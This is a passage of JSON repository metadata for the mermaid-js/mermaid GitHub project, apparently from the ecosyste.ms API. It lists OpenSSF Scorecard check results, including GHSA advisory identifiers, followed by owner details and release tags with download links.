https://app.stepsecurity.io/secureworkflow/mermaid-js/mermaid/validate-lockfile.yml/develop?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/validate-lockfile.yml:60: update your workflow using https://app.stepsecurity.io/secureworkflow/mermaid-js/mermaid/validate-lockfile.yml/develop?enable=pin","Warn: npmCommand not pinned by hash: .github/workflows/release-preview-publish.yml:32","Info:  45 out of  47 GitHub-owned GitHubAction dependencies pinned","Info:  35 out of  36 third-party GitHubAction dependencies pinned","Info:   1 out of   1 containerImage dependencies pinned","Info:   0 out of   1 npmCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#cii-best-practices"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#signed-releases"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#fuzzing"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#license"}},{"name":"SAST","score":9,"reason":"SAST tool detected but not run on all commits","details":["Info: SAST configuration detected: CodeQL","Warn: 28 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#sast"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: github.com/mermaid-js/.github/SECURITY.md:1","Info: Found linked content: github.com/mermaid-js/.github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: github.com/mermaid-js/.github/SECURITY.md:1","Info: Found text in security policy: github.com/mermaid-js/.github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#security-policy"}},{"name":"Branch-Protection","score":1,"reason":"branch protection is not maximal on development and all release branches","details":["Warn: branch protection not enabled for branch 'release/10.9.3'","Warn: branch protection not enabled for branch 'release/10.9.2'","Info: 'allow deletion' disabled on branch 'develop'","Info: 'force pushes' disabled on branch 'develop'","Warn: branch 'develop' does not require approvers","Warn: codeowners review is not required on branch 'develop'","Info: status check found to merge onto on branch 'develop'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#branch-protection"}},{"name":"CI-Tests","score":9,"reason":"11 out of 12 merged PRs checked by a CI test -- score normalized to 9","details":null,"documentation":{"short":"Determines if the project runs tests before pull requests are merged.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#ci-tests"}},{"name":"Contributors","score":10,"reason":"project has 15 contributing companies or organizations","details":["Info: found contributions from: Mermaid-Chart, OSDKDev, argoproj, check-spelling, evolutionizer, fossgect, garnercorp, gecthrissur, john deere, mermaid chart, mermaid-chart, mermaid-js, plantuml-stdlib, ringcentral, sarva"],"documentation":{"short":"Determines if the project has a set of contributors from multiple organizations (e.g., companies).","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#contributors"}},{"name":"Vulnerabilities","score":0,"reason":"23 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-968p-4wvh-cqc8","Warn: Project is vulnerable to: GHSA-xffm-g5w8-qvg7","Warn: Project is vulnerable to: GHSA-jr5f-v2jv-69x6","Warn: Project is vulnerable to: GHSA-v6h2-p8h4-qcjw","Warn: Project is vulnerable to: GHSA-pxg6-pf52-xh8x","Warn: Project is vulnerable to: GHSA-3xgq-45jj-v275","Warn: Project is vulnerable to: GHSA-67mh-4wv8-2f99","Warn: Project is vulnerable to: GHSA-mg2h-6x62-wpwc","Warn: Project is vulnerable to: GHSA-fjxv-7rqg-78g4","Warn: Project is vulnerable to: GHSA-4www-5p9h-95mh","Warn: Project is vulnerable to: GHSA-9gqv-wp59-fq42","Warn: Project is vulnerable to: GHSA-76c9-3jph-rj3q","Warn: Project is vulnerable to: GHSA-rhx6-c78j-4q9w","Warn: Project is vulnerable to: GHSA-52f5-9888-hmc6","Warn: Project is vulnerable to: GHSA-c76h-2ccp-4975","Warn: Project is vulnerable to: GHSA-cxrh-j4jr-qwg3","Warn: Project is vulnerable to: GHSA-x574-m823-4x7w","Warn: Project is vulnerable to: GHSA-4r4m-qw57-chr8","Warn: Project is vulnerable to: GHSA-xcj6-pq6g-qj4x","Warn: Project is vulnerable to: GHSA-356w-63v5-8wf4","Warn: Project is vulnerable to: GHSA-859w-5945-r5v3","Warn: Project is vulnerable to: GHSA-4v9v-hfq4-rm2v","Warn: Project is vulnerable to: GHSA-9jgg-88mc-972h"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T09:31:17.427Z","repository_id":37269779,"created_at":"2025-08-18T09:31:17.427Z","updated_at":"2025-08-18T09:31:17.427Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":273713621,"owners_count":25154614,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","status":"online","status_checked_at":"2025-09-05T02:00:09.113Z","response_time":402,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"mermaid-js","name":"mermaid-js","uuid":"57169982","kind":"organization","description":"","email":null,"website":null,"location":null,"twitter":"mermaidjs_","company":null,"icon_url":"https://avatars.githubusercontent.com/u/57169982?v=4","repositories_count":11,"last_synced_at":"2023-04-08T11:47:59.066Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/mermaid-js","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-14T05:34:15.747Z","updated_at":"2023-04-08T11:47:59.094Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/mermaid-js","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/mermaid-js/repositories"},"tags":[{"name":"mermaid@11.11.0","sha":"9c85521e168f2dc9109c317df8d41f5a8ded21a6","kind":"tag","published_at":"2025-09-04T15:08:14.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.11.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.11.0/manifests"},{"name":"@mermaid-js/tiny@11.11.0","sha":"9c85521e168f2dc9109c317df8d41f5a8ded21a6","kind":"tag","published_at":"2025-09-04T15:08:14.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/tiny@11.11.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/tiny@11.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Ftiny%4011.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.11.0/manifests"},{"name":"@mermaid-js/layout-tidy-tree@0.2.0","sha":"9c85521e168f2dc9109c317df8d41f5a8ded21a6","kind":"tag","published_at":"2025-09-04T15:08:14.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-tidy-tree@0.2.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-tidy-tree@0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-tidy-tree%400.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-tidy-tree@0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-tidy-tree@0.2.0/manifests"},{"name":"@mermaid-js/layout-elk@0.2.0","sha":"9c85521e168f2dc9109c317df8d41f5a8ded21a6","kind":"tag","published_at":"2025-09-04T15:08:14.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.2.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.2.0/manifests"},{"name":"@mermaid-js/tiny@11.10.1","sha":"af3bbdc5919e5b7d4678946a78c2034885f794ad","kind":"tag","published_at":"2025-08-22T12:08:19.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/tiny@11.10.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/tiny@11.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Ftiny%4011.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.10.1/manifests"},{"name":"mermaid@11.10.1","sha":"af3bbdc5919e5b7d4678946a78c2034885f794ad","kind":"tag","published_at":"2025-08-22T12:08:19.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.10.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.10.1/manifests"},{"name":"v10.9.4","sha":"80dcf2eaad5b484ea41b5e0a8aee3fa8c5b99d34","kind":"commit","published_at":"2025-08-19T08:40:15.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.9.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.4/manifests"},{"name":"@mermaid-js/tiny@11.10.0","sha":"96778f77898c02489ba0d33c874eca4370e21205","kind":"tag","published_at":"2025-08-19T08:05:08.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/tiny@11.10.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/tiny@11.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Ftiny%4011.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.10.0/manifests"},{"name":"mermaid@11.10.0","sha":"96778f77898c02489ba0d33c874eca4370e21205","kind":"tag","published_at":"2025-08-19T08:05:08.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.10.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.10.0/manifests"},{"name":"@mermaid-js/layout-elk@0.1.9","sha":"96778f77898c02489ba0d33c874eca4370e21205","kind":"tag","published_at":"2025-08-19T08:05:08.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.9","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.9/manifests"},{"name":"@mermaid-js/mermaid-zenuml@0.2.2","sha":"96778f77898c02489ba0d33c874eca4370e21205","kind":"tag","published_at":"2025-08-19T08:05:08.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/mermaid-zenuml@0.2.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/mermaid-zenuml@0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Fmermaid-zenuml%400.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fmermaid-zenuml@0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fmermaid-zenuml@0.2.2/manifests"},{"name":"mermaid@11.9.0","sha":"767754f4fbfe22e74e0612c5d684e9b58c3c5caf","kind":"commit","published_at":"2025-07-16T08:25:22.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.9.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.9.0/manifests"},{"name":"@mermaid-js/tiny@11.8.1","sha":"1aa28702245f9c874dc7b24ba20cb24d29a8bc17","kind":"tag","published_at":"2025-07-07T15:24:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/tiny@11.8.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/tiny@11.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Ftiny%4011.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.8.1/manifests"},{"name":"mermaid@11.8.1","sha":"1aa28702245f9c874dc7b24ba20cb24d29a8bc17","kind":"tag","published_at":"2025-07-07T15:24:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.8.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.8.1/manifests"},{"name":"@mermaid-js/parser@0.6.1","sha":"1aa28702245f9c874dc7b24ba20cb24d29a8bc17","kind":"tag","published_at":"2025-07-07T15:24:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/parser@0.6.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/parser@0.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Fparser%400.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.6.1/manifests"},{"name":"@mermaid-js/parser@0.6.0","sha":"2b3cb6a362b81dad47cdbe246c1be97831c3b30f","kind":"tag","published_at":"2025-07-03T13:52:52.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/parser@0.6.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/parser@0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Fparser%400.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.6.0/manifests"},{"name":"@mermaid-js/tiny@11.8.0","sha":"2b3cb6a362b81dad47cdbe246c1be97831c3b30f","kind":"tag","published_at":"2025-07-03T13:52:52.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/tiny@11.8.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/tiny@11.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Ftiny%4011.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.8.0/manifests"},{"name":"mermaid@11.8.0","sha":"2b3cb6a362b81dad47cdbe246c1be97831c3b30f","kind":"tag","published_at":"2025-07-03T13:52:52.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.8.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.8.0/manifests"},{"name":"@mermaid-js/mermaid-zenuml@0.2.1","sha":"1f07a781e4d0d6ba196939a0ab1102698d749faf","kind":"tag","published_at":"2025-06-20T05:03:36.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/mermaid-zenuml@0.2.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/mermaid-zenuml@0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Fmermaid-zenuml%400.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fmermaid-zenuml@0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fmermaid-zenuml@0.2.1/manifests"},{"name":"mermaid@11.7.0","sha":"1f07a781e4d0d6ba196939a0ab1102698d749faf","kind":"tag","published_at":"2025-06-20T05:03:36.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.7.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.7.0/manifests"},{"name":"@mermaid-js/tiny@11.7.0","sha":"1f07a781e4d0d6ba196939a0ab1102698d749faf","kind":"tag","published_at":"2025-06-20T05:03:36.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/tiny@11.7.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/tiny@11.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Ftiny%4011.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.7.0/manifests"},{"name":"@mermaid-js/parser@0.5.0","sha":"1f07a781e4d0d6ba196939a0ab1102698d749faf","kind":"tag","published_at":"2025-06-20T05:03:36.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/parser@0.5.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/parser@0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Fparser%400.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.5.0/manifests"},{"name":"@mermaid-js/layout-elk@0.1.8","sha":"1f07a781e4d0d6ba196939a0ab1102698d749faf","kind":"tag","published_at":"2025-06-20T05:03:36.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.8","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.8/manifests"},{"name":"mermaid@11.6.0","sha":"7b2083926dbe3b6280f42376a0d4195b2c72fb8e","kind":"tag","published_at":"2025-03-25T11:43:55.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.6.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.6.0/manifests"},{"name":"@mermaid-js/parser@0.4.0","sha":"7b2083926dbe3b6280f42376a0d4195b2c72fb8e","kind":"tag","published_at":"2025-03-25T11:43:55.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/parser@0.4.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/parser@0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Fparser%400.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.4.0/manifests"},{"name":"mermaid@11.5.0","sha":"41a737f6821df4cdeab75643984912b82c1dff7a","kind":"tag","published_at":"2025-03-13T10:34:06.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.5.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.5.0/manifests"},{"name":"@mermaid-js/layout-elk@0.1.7","sha":"becadf0a7de509b6cc81e99a04abfa6cba8e7bfd","kind":"tag","published_at":"2024-11-27T17:15:52.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.7","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.7/manifests"},{"name":"mermaid@11.4.1","sha":"9868f3a4c3784e214d8b6c74277ca542774e7de9","kind":"tag","published_at":"2024-11-27T11:03:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.4.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.4.1/manifests"},{"name":"@mermaid-js/layout-elk@0.1.6","sha":"9868f3a4c3784e214d8b6c74277ca542774e7de9","kind":"tag","published_at":"2024-11-27T11:03:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js